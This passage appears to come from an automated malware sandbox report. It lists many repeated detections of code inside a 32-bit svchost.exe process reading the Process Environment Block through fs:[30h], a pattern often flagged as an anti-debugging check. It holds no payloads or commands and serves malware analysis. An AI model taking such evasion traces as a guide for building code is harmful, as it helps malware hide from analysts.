            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]1_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]1_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]1_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]1_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]1_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]1_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]1_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]1_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]1_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]1_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]1_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]1_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]1_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]1_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]1_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]1_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]1_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]1_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]1_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]1_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]1_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]1_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]1_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]1_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]1_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]1_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]1_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]1_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]1_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]1_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]1_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]1_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]1_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]1_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]1_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]1_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]1_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]1_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]1_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]1_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]1_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]1_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]1_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]1_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]1_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]1_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]1_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]1_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]1_2_032D8B42
